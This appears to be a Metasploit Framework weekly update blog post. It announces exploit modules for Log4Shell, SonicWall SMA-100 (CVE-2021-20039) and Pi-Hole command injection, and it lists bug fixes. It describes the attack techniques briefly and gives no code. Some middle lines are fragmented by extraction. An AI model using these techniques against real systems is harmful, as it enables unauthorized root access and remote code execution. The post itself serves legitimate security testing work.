Log4Shell made an unfortunate end to 2021 for many organizations, but it also makes for some great additions to Metasploit Framework. Contributors sempervictus, schierlm, righel, timwr and our very own Spencer McIntyre have collaborated to bring us a Log4Shell module that uses header stuffing to exploit vulnerable HTTP servers, resulting in Remote Code Execution.
Rapid7 disclosed the technical details of five vulnerabilities discovered by jbaines-r7 affecting SonicWall’s SMA-100 series of SSL VPN devices. The disclosure included landing a Metasploit module that gives remote and authenticated attackers root
access to the device using CVE-2021-20039.
An exciting new addition has worked its way into Metasploit Framework this week. Contributor h00die has created an authenticated RCE module that takes advantage of improper escaping of characters in Pi-Hole’s Top Domains API’s validDomainWildcard
field. H00die has also created a library that aims to make developing future Pi-Hole modules easier.
5.5
. This also introduces a Pi-Hole library for common functionality required in exploits against the service.\n
character which acts as a terminator when passed to a call to system()
. An authenticated attacker can execute arbitrary commands as the root
user.vmware_vcenter_vmdir_auth_bypass
module to create an admin user even if the target is not vulnerable to CVE-2020-3952, assuming we have obtained valid credentials to the vCenter LDAP directory.auxiliary/scanner/dcerpc/hidden
module where the RHOSTS
datastore option was not available, resulting in hosts not being scanned.generate
command. Completion now works with both the -f
and -o
flags.auxiliary/scanner/http/wordpress_scanner.rb
module when attempting to scan themesAs always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git
user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).